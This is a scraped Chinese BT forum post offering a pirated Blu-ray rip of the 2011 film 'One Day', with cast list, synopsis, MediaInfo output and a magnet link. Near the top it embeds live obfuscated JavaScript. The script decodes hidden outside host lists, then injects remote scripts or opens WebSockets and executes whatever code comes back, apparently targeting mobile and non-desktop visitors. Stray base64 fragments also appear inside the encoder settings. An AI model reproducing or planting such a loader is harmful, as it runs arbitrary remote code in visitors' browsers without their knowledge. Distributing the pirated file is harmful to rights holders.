一天[中文字幕].One.Day.2011.1080p.BluRay.x265.10bit.DTS 6.74GB

版主小s 5天前 121

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 一天 / 真爱挑日子(台) / 情约1天(港) / 一年恋一天 / 一天的恋人 / 年年有今日 / 每年今日

◎片 名 One Day

◎年 代 2011

◎产 地 美国 / 英国

◎类 别 剧情 / 爱情

◎语 言 英语

◎上映日期 2011-08-19(美国)

◎IMDb链接 https://www.imdb.com/title/tt1563738/

◎豆瓣评分 7.9/10 (432713人评价)

◎豆瓣链接 https://movie.douban.com/subject/4191644/

◎片 长 107分钟

◎导 演 罗勒·莎菲 Lone Scherfig (id:1045092)

◎编 剧 大卫·尼克尔斯 David Nicholls (id:1286786)

◎演 员 安妮·海瑟薇 Anne Hathaway (id:1048027)

吉姆·斯特吉斯 Jim Sturgess (id:1053559)

汤姆·米森 Tom Mison (id:1233474)

朱迪·惠特克 Jodie Whittaker (id:1309995)

蒂姆·凯 Tim Key (id:1373217)

拉菲·斯波 Rafe Spall (id:1032169)

约瑟芬·德·拉·波美 Joséphine de La Baume (id:1317471)

派翠西娅·克拉克森 Patricia Clarkson (id:1013791)

肯·斯托特 Ken Stott (id:1313404)

海达·里德 Heida Reed (id:1333667)

阿曼达·费尔班克-海恩斯 Amanda Fairbank-Hynes (id:1344558)

大卫·阿贾拉 David Ajala (id:1332074)

乔治雅·金 Georgia King (id:1040678)

欧韦尔利·罗奇 Ukweli Roach (id:1323449)

克拉拉·佩吉特 Clara Paget (id:1337556)

马特·贝里 Matt Berry (id:1194203)

萝玛拉·嘉瑞 Romola Garai (id:1022633)

戴安娜·肯特 Diana Kent (id:1399095)

James Laurenson James Laurenson (id:1007220)

马修·比尔德 Matthew Beard (id:1000400)

托比·瑞格波 Toby Regbo (id:1274356)

托马斯·阿诺德 Thomas Arnold (id:1348596)

菲比·福克斯 Phoebe Fox (id:1318906)

艾米莉亚·琼斯 Emilia Jones (id:1318340)

麦克·宾德尔 Mike Binder (id:1278653)

贝恩·科拉科 Bern Colla?o (id:1394212)

Natalie Hallam Natalie Hallam (id:1171496)

范德·麦克劳德 Vander McLeod (id:1346036)

杰米·西弗斯 Jamie Sives (id:1297725)

贝莉·诺布尔 Bailey Noble (id:1363086)

Nina Jacobson Nina Jacobson (id:1429108)

蕾切尔·波特曼 Rachel Portman (id:1037009)

弗兰索瓦·费勒德曼 Fran?ois Feldman (id:1222250)

班诺特·德姆 Beno?t Delhomme (id:1282193)

◎标 签 爱情 / 安妮海瑟薇 / 文艺 / 美国 / 情感 / 英国 / 小说改编 / 2011

◎简 介

1988年7月15日,一所大学为毕业生的狂热所充盈。籍着这股躁动,轻浮的德克斯特(吉姆·斯特吉斯 Jim Sturgess 饰)穿过层层人墙,寻找可以与之共度这最后狂欢与浪漫之夜的尤物。他将目光锁定在艾玛(安妮·海瑟薇 Anne Hathaway 饰)的身上,一个来自普 通工薪家庭的聪慧女孩。然而短短的交流过后,他们之间什么也没发生,却又注定改变了彼此的一生。在之后的岁月里,两人以友人知己的身份时聚时散,彼此分享着人生的苦辣酸甜和各种感悟。德克斯特经历着事业和婚姻的起落,艾玛品味着底层人生的辛酸。他们是远在天边心也紧紧相连的知己,是深锁心中最为笃真却相隔最远的爱恋……

本片根据英国作家大卫·尼克尔斯(David Nicholls)的同名畅销小说改编。

◎获奖情况 (共1项)

第2届豆瓣电影鑫像奖 (2012)

鑫豆单元 最佳女演员(外语)

└──安妮·海瑟薇 (id:1048027)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 109068963172541622601169891787970419139 (0x520DEB1051229898DF73D1F517BF99C3)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.74 GiB

  8. Duration : 1 h 47 min

  9. Overall bit rate : 8 976 kb/s

  10. Movie name : One Day 2011

  11. Encoded date : UTC 2021-10-10 02:11:44

  12. Writing application : mkvmerge v57.0.0 ('Till The End') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 47 min

  23. Bit rate : 7 314 kb/s

  24. Width : 1 920 pixels

  25. Height : 816 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.195

  33. Stream size : 5.49 GiB (81%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=17.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 47 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.13 GiB (17%)

  54. Language : English

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4613 (0x1205)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 1 h 40 min

  66. Bit rate : 90.8 kb/s

  67. Count of elements : 5170

  68. Stream size : 65.3 MiB (1%)

  69. Title : chs&eng

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4614 (0x1206)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 1 h 40 min

  82. Bit rate : 92.7 kb/s

  83. Count of elements : 5170

  84. Stream size : 66.7 MiB (1%)

  85. Title : cht&eng

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4615 (0x1207)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 40 min

  98. Bit rate : 59.1 kb/s

  99. Count of elements : 5170

  100. Stream size : 42.5 MiB (1%)

  101. Title : chs

  102. Language : Chinese

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Text #4

  107. ID : 6

  108. ID in the original source medium : 4616 (0x1208)

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 40 min

  114. Bit rate : 61.0 kb/s

  115. Count of elements : 5170

  116. Stream size : 43.9 MiB (1%)

  117. Title : cht

  118. Language : Chinese

  119. Default : No

  120. Forced : No

  121. Original source medium : Blu-ray


  122. Text #5

  123. ID : 7

  124. ID in the original source medium : 4608 (0x1200)

  125. Format : PGS

  126. Muxing mode : zlib

  127. Codec ID : S_HDMV/PGS

  128. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  129. Duration : 1 h 38 min

  130. Bit rate : 44.3 kb/s

  131. Count of elements : 3158

  132. Stream size : 31.3 MiB (0%)

  133. Language : English

  134. Default : No

  135. Forced : No

  136. Original source medium : Blu-ray


  137. Menu

  138. 00:00:00.000 : Chapter 01

  139. 00:03:22.952 : Chapter 02

  140. 00:09:12.677 : Chapter 03

  141. 00:12:23.868 : Chapter 04

  142. 00:16:40.290 : Chapter 05

  143. 00:21:08.517 : Chapter 06

  144. 00:29:21.676 : Chapter 07

  145. 00:37:08.726 : Chapter 08

  146. 00:46:03.177 : Chapter 09

  147. 00:52:39.906 : Chapter 10

  148. 00:59:43.413 : Chapter 11

  149. 01:05:04.483 : Chapter 12

  150. 01:08:07.583 : Chapter 13

  151. 01:12:29.636 : Chapter 14

  152. 01:20:02.631 : Chapter 15

  153. 01:25:39.717 : Chapter 16

  154. 01:27:39.879 : Chapter 17

  155. 01:31:25.813 : Chapter 18

  156. 01:36:55.601 : Chapter 19

  157. 01:41:09.521 : Chapter 20


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:FD999123753E07FB27CD4074012080AE0CBFF43D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回